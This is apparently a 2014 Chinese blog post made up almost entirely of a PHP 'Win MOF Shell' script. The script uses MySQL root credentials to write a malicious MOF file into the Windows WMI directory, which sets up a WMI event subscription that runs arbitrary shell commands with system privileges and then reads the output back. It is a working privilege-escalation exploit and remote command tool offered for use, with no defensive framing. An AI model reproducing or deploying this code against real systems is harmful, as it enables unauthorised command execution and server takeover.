mof提权带回显带清楚命令版本.php
2014-04-14 20:19
260 查看
<?php $path="c:/caonimei.txt"; session_start(); if(!empty($_POST['submit'])){ setcookie("connect"); setcookie("connect[host]",$_POST['host']); setcookie("connect[user]",$_POST['user']); setcookie("connect[pass]",$_POST['pass']); setcookie("connect[dbname]",$_POST['dbname']); echo "<script>location.href='?action=connect'</script>"; } if(empty($_GET["action"])){ ?> <html> <head><title>Win MOF Shell</title></head> <body> <form action="?action=connect" method="post"> Host: <input type="text" name="host" value="192.168.200.144:3306"><br/> User: <input type="text" name="user" value="root"><br/> Pass: <input type="password" name="pass" value="toor"><br/> DB: <input type="text" name="dbname" value="mysql"><br/> <input type="submit" name="submit" value="Submit"><br/> </form> </body> </html> <?php exit; } if ($_GET[action]=='connect') { $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"]) or die('<pre>'.mysql_error().'</pre>'); echo "<form action='' method='post'>"; echo "Cmd:"; echo "<input type='text' name='cmd' value='$strCmd'?>"; echo "<br>"; echo "<br>"; echo "<input type='submit' value='Exploit'>"; echo "</form>"; echo "<form action='' method='post'>"; echo "<input type='hidden' name='flag' value='flag'>"; echo "<input type='submit'value=' Read '>"; echo "</form>"; if (isset($_POST['cmd'])){ $strCmd=$_POST['cmd']; $cmdshell='cmd /c '.$strCmd.'>'.$path; $mofname="c:/windows/system32/wbem/mof/system.mof"; $payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\") instance of __EventFilter as \$EventFilter { EventNamespace = \"Root\\\\\\\\Cimv2\"; Name = \"filtP2\"; Query = \"Select * From __InstanceModificationEvent \" \"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \" \"And TargetInstance.Second = 5\"; QueryLanguage = \"WQL\"; }; instance of ActiveScriptEventConsumer as \$Consumer { Name = \"consPCSV2\"; ScriptingEngine = \"JScript\"; ScriptText = \"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"$cmdshell\\\\\")\"; }; instance of __FilterToConsumerBinding { Consumer = \$Consumer; Filter = \$EventFilter; };"; mysql_select_db($_COOKIE["connect"]["dbname"],$conn); $sql1="select '$payload' into dumpfile '$mofname';"; if(mysql_query($sql1)) echo "<hr>Execute Successful!<br> Please click the read button to check the result!!<br>If the result is not correct,try read again later<br><hr>"; else die(mysql_error()); mysql_close($conn); } if(isset($_POST['flag'])) { $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"]) or die('<pre>'.mysql_error().'</pre>'); $sql2="select load_file(\"".$path."\");"; $result2=mysql_query($sql2); $num=mysql_num_rows($result2); while ($row = mysql_fetch_array($result2, MYSQL_NUM)) { echo "<hr/>"; echo '<pre>'. $row[0].'</pre>'; } mysql_close($conn); } } ?>
相关文章推荐
- TProfiler--001
- FTP服务器搭建基础工具:Serv-U 14.0.2使用教程
- WindowManager.LayoutParams
- php 多维数组按数组的某一字段排序 数组排序
- php调用mysql存储过程返回结果集的处理
- php 5.3.3以后的版本中 php-fpm 的重启、终止操作命令
- LoadRunner中lr_output_message和lr_log_message
- PHP CURL POST方式上传文件中遇到的问题及解决方案
- php的一些配置
- eixt(0),ExitProcess和TerminateProcess的区别和联系
- php防止表单重复提交
- php curl_init函数用法
- Thinkphp ajaxReturn解决中文unicode问题
- 关于XAMPP phpmyadmin 无法访问的问题
- Web_PHP_DedeCMS织梦自定义图片字段调用的问题出现{dede:img ..}
- (3)php日期和时间
- curl重写php file_get_contents
- PHP 实现本地多文件同时上传到服务器端不同文件夹下
- (2)PHP日期和时间(显示本地化)
- PHP分页实例代码